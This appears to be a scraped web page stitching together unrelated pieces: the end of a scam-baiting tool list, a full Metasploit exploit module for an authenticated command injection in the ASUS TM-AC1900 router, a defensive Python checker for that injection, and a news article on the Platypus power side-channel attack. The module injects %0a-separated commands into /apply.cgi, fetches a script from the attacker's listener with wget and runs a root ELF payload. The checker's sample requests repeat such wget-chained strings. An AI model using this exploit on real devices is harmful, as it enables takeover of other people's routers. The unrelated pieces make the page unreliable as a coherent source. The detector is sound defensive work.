4. GOOD DIALOGUE
5. SCREEN RECORDER
6. VOIP PHONE DIALER
7. VOICE CHANGER
8. TEAMVIEWER (Reverse Connection)
9. LINGOBLASTER
10. MACROS (Want)
11. VPN (Virtual Private Network)
12. OSINT (Intelligence Gathering on scammers)


ASUS TM-AC1900 Arbitrary Command Execution Exploit


This Metasploit module exploits an authenticated command injection in the web interface of the ASUS TM-AC1900 router. The SystemCmd argument of /apply.cgi (used by the Main_Analysis_Content.asp network-diagnostics page) is passed to a shell, and the fix for CVE-2018-9285 does not strip percent-encoded newlines (%0a), so a newline-separated list of commands is executed in place of the single diagnostic command.

The module first verifies the supplied web-portal credentials with an HTTP Basic-auth GET to /Main_Analysis_Content.asp. It then sends the injected command string to /apply.cgi (spaces encoded as ‘+’, separators as %0a) together with the required action_mode and current_page arguments, and triggers execution by requesting /Main_Analysis_Content.asp again.

The injected commands change to /tmp, fetch a shell script from the module’s own HTTP listener (SRVHOST or LHOST, port SRVPORT) with wget and run it; that script in turn downloads the Linux ARM little-endian ELF payload to /tmp and executes it in the background. Both dropped files are registered for cleanup, and the module is marked Privileged, meaning the resulting session runs with root-level privileges.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
   
    include Msf::Exploit::Remote::HttpServer
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE
    include Msf::Exploit::FileDropper
   
    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'ASUS TM-AC1900 - Arbitrary Command Execution',
        'Description'    => %q{
          This module exploits a code execution vulnerability within the ASUS
          TM-AC1900 router as an authenticated user. The vulnerability is due to
          a failure to filter out percent encoded newline characters (%0a) within
          the HTTP argument 'SystemCmd' when invoking "/apply.cgi" which bypasses
          the patch for CVE-2018-9285.
        },
        'Author'         =>
          [
            'b1ack0wl' # vuln discovery + exploit developer
          ],
        'License'        => MSF_LICENSE,
        'Platform'       => 'linux',
        'Arch'           => ARCH_ARMLE,
        'References'     =>
          [
            # CVE which shows that this functionality has been patched before ;)
            ['URL', 'https://www.cvedetails.com/cve/CVE-2018-9285/'],
            ['URL', 'https://github.com/b1ack0wl/OffensiveCon20/tree/master/TM-AC1900']
          ],
        'Privileged'     => true,
        'Targets'        =>
          [
            # this may work on other asus routers as well, but I've only tested this on the TM-AC1900.
            [ 'ASUS TM-AC1900 <= v3.0.0.4.376_3199',
              {}
            ]
          ],
        'DisclosureDate' => 'April 18, 2020',
        'DefaultTarget' => 0))
      register_options(
          [
            OptString.new('USERNAME', [true, 'Username for the web portal.', 'admin']),
            OptString.new('PASSWORD', [true, 'Password for the web portal.', 'admin'])
          ])
    end
   
    def check_login
      begin
        res = send_request_cgi({
          'method'  => 'GET',
          'uri'     => "/Main_Analysis_Content.asp",
          'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
        })
        if res and res.code == 200
          # all good :)
          return res
        else
          fail_with(Failure::NoAccess, 'Invalid password.')
        end
      rescue ::Rex::ConnectionError
          fail_with(Failure::Unreachable, 'Connection failed.')
      end
    end
   
    def on_request_uri(cli, request)
      if request.uri == '/'
        # injected command has been executed
        print_good("Sending bash script...")
        @filename = rand_text_alpha(16)
        bash_script = %Q|
        #!/bin/sh
        wget #{@lhost_srvport}/#{rand_text_alpha(16)} -O /tmp/#{@filename}
        chmod +x /tmp/#{@filename}
        /tmp/#{@filename} &
        |
        send_response(cli, bash_script)
      else
        # bash script has been executed. serve up the ELF file
        exe_payload = generate_payload_exe()
        print_good("Sending ELF file...")
        send_response(cli, exe_payload)
        # clean up
        register_file_for_cleanup("/tmp/index.html")
        register_file_for_cleanup("/tmp/#{@filename}")
      end
    end
   
    def exploit
      # make sure the supplied password is correct
      check_login
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = datastore['LHOST']
      else
       srv_host = datastore['SRVHOST']
      end
      print_status("Exploiting #{target.name}...")
      @lhost_srvport = "#{srv_host}:#{datastore['SRVPORT']}"
      start_service({'Uri' => {'Proc' => Proc.new { 
        |cli, req| on_request_uri(cli, req)
        },
          'Path' => '/'
      }})
      begin
        # store the cmd to be executed
        cmd =  "ping+-c+1+127.0.0.1;cd+..;cd+..;cd+tmp;rm+index.html;"
        cmd << "wget+#{@lhost_srvport};chmod+777+index.html;sh+index.html"
        res = send_request_cgi({
          'method'        => 'GET',
          'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
          # spaces need to be '+' and not %20, so cheap hack.exe it is.
          # required HTTP args: SystemCmd, action_mode, and current_page
          'uri'           => "/apply.cgi?SystemCmd=#{cmd.gsub(';',"%0a")}&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp"
        })
        # now trigger it via check_login
        res = check_login
        if res and res.code == 200
          print_status("Waiting up to 10 seconds for the payload to execute...")
          select(nil, nil, nil, 10)
        end
      rescue ::Rex::ConnectionError
        fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
      end
    end
  end
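The injection the module relies on, seen from the defender's side, as an added example that is not part of the module, the page or ASUS firmware: a Python checker that decodes the SystemCmd argument of apply.cgi request lines and flags newline- or ‘;’-separated command chains, beside an allowlist for the shape a diagnostic command should have. The request lines are constructed for the example, and the allowlist is an assumption about what the network-analysis page legitimately accepts (one of ping, traceroute or nslookup plus a host).

```python
# Added example (not part of the module or of ASUS firmware): decode the SystemCmd
# argument of apply.cgi requests and flag the %0a / ';' injection the module relies on.
# Request lines below are constructed for the example; the allowlist shape is an
# assumption about what the network-analysis page legitimately accepts.
import re
from urllib.parse import urlsplit, unquote_plus

SAMPLE_REQUESTS = [
    # benign use of the diagnostics page
    "GET /apply.cgi?SystemCmd=ping+-c+3+8.8.8.8&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp HTTP/1.1",
    # newline-separated chain of the kind the module sends (%0a survives the CVE-2018-9285 fix)
    "GET /apply.cgi?SystemCmd=ping+-c+1+127.0.0.1%0acd+..%0acd+..%0acd+tmp%0awget+192.0.2.10:8080&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp HTTP/1.1",
    # the older ';' separator
    "GET /apply.cgi?SystemCmd=ping+-c+1+127.0.0.1;id&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp HTTP/1.1",
    # unrelated request, ignored
    "GET /Main_Analysis_Content.asp HTTP/1.1",
]

SHELL_METACHARS = set("\n\r;|&`$()<>")
# One diagnostic tool, optional count, one host; anything else is rejected rather than cleaned.
ALLOWED_CMD = re.compile(r"^(ping|traceroute|nslookup) (-c [1-9][0-9]? )?[A-Za-z0-9.:-]{1,253}$")


def parse_query(query):
    """Split on '&' only and percent-decode each side, so ';' stays inside the value."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def extract_system_cmd(request_line):
    """Return the decoded SystemCmd of an apply.cgi request line, or None for anything else."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    if url.path != "/apply.cgi":
        return None
    values = parse_query(url.query).get("SystemCmd")
    return values[0] if values else None


def classify(cmd):
    """('injection', first_metachar) if a shell metacharacter is present,
    ('allowed', None) if it matches the diagnostic shape, else ('rejected', None)."""
    for ch in cmd:
        if ch in SHELL_METACHARS:
            return "injection", ch
    return ("allowed", None) if ALLOWED_CMD.match(cmd) else ("rejected", None)


def scan(request_lines):
    """Verdict per apply.cgi request: (verdict, metachar, first line of the decoded command)."""
    findings = []
    for line in request_lines:
        cmd = extract_system_cmd(line)
        if cmd is not None:
            verdict, ch = classify(cmd)
            findings.append((verdict, ch, (cmd.splitlines() or [""])[0]))
    return findings


if __name__ == "__main__":
    for verdict, ch, cmd in scan(SAMPLE_REQUESTS):
        print(f"{verdict:9} {ch!r:6} {cmd}")
```

Run as a script it prints one verdict per constructed request; the same functions can be fed request lines from a proxy or packet capture in front of the router. Two design points matter here: the query string is split on ‘&’ only, so a ‘;’ inside the value is seen rather than treated as a separator, and validation is an allowlist that rejects anything off-shape instead of stripping known-bad characters, which is exactly the denylist approach the %0a bypass defeats.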


Intel and AMD processors affected by another side-channel exploit


Almost three years after Spectre and Meltdown, the x86 processor faces another side-channel exploit – only this time it is based on measuring power consumption

While Spectre and Meltdown may be long forgotten, another side-channel attack, dubbed Platypus, is haunting Intel and AMD processors.

An international team of security researchers has found that fluctuations in a processor’s power consumption while it runs software, as reported by the chip’s own energy counters, can be exploited to extract sensitive data on Intel processors.

The researchers describe power side-channel attacks as attacks that exploit fluctuations in power consumption to extract sensitive data such as cryptographic keys.

In the past, attacks trying to exploit power measurements were not particularly accurate or effective, as they required physical access to the target device and special measurement tools such as an oscilloscope. 

But a research team, led by the Institute of Applied Information Processing and Communications at Graz University of Technology, together with the University of Birmingham and the Helmholtz Center for Information Security (CISPA), has identified a way through which power side-channel attacks can access sensitive data with unprecedented accuracy – even without physical access. 

The team said they were able to demonstrate such an attack on desktop PCs, laptops and cloud computing servers from Intel and AMD.

David Oswald, senior lecturer in cyber security at the University of Birmingham, said: “Platypus attacks show that power side channels – which were previously only relevant to small embedded devices like payment cards – are a relevant threat to processors in our laptops and servers.

“Our work connects the dots between two research areas and highlights that power side-channel leakage has much wider relevance than previously thought.”

The researchers found that the RAPL (Running Average Power Limit) interface built into Intel and AMD CPUs, which reports the processor’s energy consumption, could be read without system administrator rights: on Linux the powercap driver exposed the energy counters in sysfs to any local user, so the measured values could be read without any authorisation.

The second part of the attack involves Intel’s Software Guard Extensions (SGX), which is designed to move data and critical programs to an isolated environment, called an enclave, where they are secure – even if the normal operating system is already compromised by malware. 

The researchers said they used a compromised operating system to target Intel SGX, making the processor execute certain instructions tens of thousands of times within an SGX enclave. By measuring the power consumption of each of these instructions, they said they were eventually able to reconstruct data and cryptographic keys.

Oswald said Intel is currently pushing microcode updates to address the attack against Intel SGX. “There will be a Linux kernel patch that disables the access to the RAPL interface from unprivileged code,” he added, meaning that only the root user will be able to read RAPL measurements.
